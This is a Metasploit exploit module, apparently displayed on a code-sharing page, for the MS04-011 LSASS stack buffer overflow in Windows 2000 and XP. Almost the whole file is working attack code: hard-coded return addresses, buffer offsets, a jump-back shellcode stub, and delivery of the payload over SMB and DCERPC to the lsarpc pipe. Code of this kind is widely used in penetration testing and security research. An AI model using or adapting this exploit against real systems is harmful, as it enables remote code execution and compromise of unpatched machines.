Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  #
10
  # This module exploits a vulnerability in the LSASS service
11
  #
12
  include Msf::Exploit::Remote::DCERPC
13
  include Msf::Exploit::Remote::SMB::Client
14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
18
      'Description'    => %q{
19
          This module exploits a stack buffer overflow in the LSASS service, this vulnerability
20
        was originally found by eEye. When re-exploiting a Windows XP system, you will need
21
        need to run this module twice. DCERPC request fragmentation can be performed by setting
22
        'FragSize' parameter.
23
      },
24
      'Author'         => [ 'hdm' ],
25
      'License'        => MSF_LICENSE,
26
      'References'     =>
27
        [
28
          [ 'CVE', '2003-0533' ],
29
          [ 'OSVDB', '5248'     ],
30
          [ 'BID', '10108' ],
31
          [ 'MSB',   'MS04-011' ],
32
        ],
33
      'Privileged'     => true,
34
      'DefaultOptions' =>
35
        {
36
          'EXITFUNC' => 'thread'
37
        },
38
      'Payload'        =>
39
        {
40
          'Space'    => 1024,
41
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
42
          'StackAdjustment' => -3500,
43
        },
44
      'Platform'       => 'win',
45
      'Targets'        =>
46
        [
47
          # Automatic
48
          [
49
            'Automatic Targetting',
50
            {
51
              'Rets'     => [ ],
52
            },
53
          ],
54
          # Windows 2000
55
          [
56
            'Windows 2000 English',
57
            {
58
              'Rets'     => [ 0x773242e0 ],
59
            },
60
          ],
61
          # Windows XP
62
          [
63
            'Windows XP English',
64
            {
65
              'Rets'     => [ 0x7449bf1a ],
66
            },
67
          ],
68
        ],
69
      'DefaultTarget'  => 0,
70
      'DisclosureDate' => '2004-04-13'))
71

72
    deregister_options('SMB::ProtocolVersion')
73
  end
74

75
  def exploit
76

77
    connect(versions: [1])
78
    smb_login()
79

80
    handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
81
    print_status("Binding to #{handle}...")
82
    dcerpc_bind(handle)
83
    print_status("Bound to #{handle}...")
84

85
    print_status('Getting OS information...')
86

87
    # Check the remote OS name and version
88
    os = smb_peer_os
89
    buff = ''
90
    case os
91

92
      # Windows 2000 requires that the string be unicode formatted
93
      # and give us a nice set of registers which point back to
94
      # the un-unicoded data. We simply return to a nop sled that
95
      # jumps over the return address, some trash, and into the
96
      # final payload. Easy as pie.
97
      when /Windows 5\.0/
98
        str = rand_text_alphanumeric(3500)
99
        str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
100
        str[2104, payload.encoded.length ] = payload.encoded
101
        buff = NDR.UnicodeConformantVaryingString(str)
102

103
      # Windows XP is a bit different, we need to use an ascii
104
      # buffer and a jmp esp. The esp register points to an
105
      # eight byte segment at the end of our buffer in memory,
106
      # we make these bytes jump back to the beginning of the
107
      # buffer, giving us about 1936 bytes of space for a
108
      # payload.
109
      when /Windows 5\.1/
110
        str = rand_text_alphanumeric(7000) + "\x00\x00"
111
        str[0, payload.encoded.length ] = payload.encoded
112
        str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
113
        str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
114
        str[6998, 2] = "\x00\x00"
115
        buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
116

117
      # Unsupported target
118
      else
119
        print_status("No target is available for #{ os }")
120
        return
121
    end
122

123
    stub = buff +
124
      NDR.long(rand(0xFFFFFF)) +
125
      NDR.UnicodeConformantVaryingString('') +
126
      NDR.UnicodeConformantVaryingString('') +
127
      NDR.UnicodeConformantVaryingString('') +
128
      NDR.UnicodeConformantVaryingString('') +
129
      NDR.long(rand(0xFFFFFF)) +
130
      NDR.UnicodeConformantVaryingString('') +
131
      NDR.long(rand(0xFFFFFF)) +
132
      NDR.UnicodeConformantVaryingString('') +
133
      NDR.long(rand(0xFFFFFF)) +
134
      NDR.UnicodeConformantVaryingString('') +
135
      rand_text(528) +
136
      rand_text(528) +
137
      NDR.long(rand(0xFFFFFF))
138

139
    print_status("Trying to exploit #{os}")
140

141
    begin
142
      response = dcerpc_call(9, stub)
143
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
144
      print_status('Server did not respond, but that should be ok...')
145
    rescue Rex::Proto::DCERPC::Exceptions::Fault
146
      case $!.fault
147
      when 0x1c010002
148
        print_status('Server appears to have been patched')
149
      else
150
        print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault)
151
      end
152
    end
153

154
    # Perform any required client-side payload handling
155
    handler
156
  end
157
end
158

159